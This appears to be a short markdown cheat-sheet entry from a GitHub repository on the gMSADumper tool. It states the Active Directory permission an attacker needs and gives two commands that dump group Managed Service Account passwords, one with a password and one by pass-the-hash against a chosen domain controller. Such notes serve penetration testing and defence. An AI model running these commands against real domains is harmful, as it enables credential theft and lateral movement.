Skip to content

Latest commit

 

History

History
18 lines (14 loc) · 488 Bytes

gMSADumper.md

File metadata and controls

18 lines (14 loc) · 488 Bytes

Source

https://github.com/micahvandeusen/gMSADumper

Prerequisite

Attacker user needs be listed in the property PrincipalsAllowedToRetrieveManagedPassword of target account.

Read all gMSA passwords from any possible computer

python3 gMSADumper.py -u <user> -p <password> -d <domain>

Read all gMSA password from any possible using NT hash and specific domain controller

python3 gMSADumper.py -u <user> -p <lmHash:ntHash> -d <domain> -l <rhost>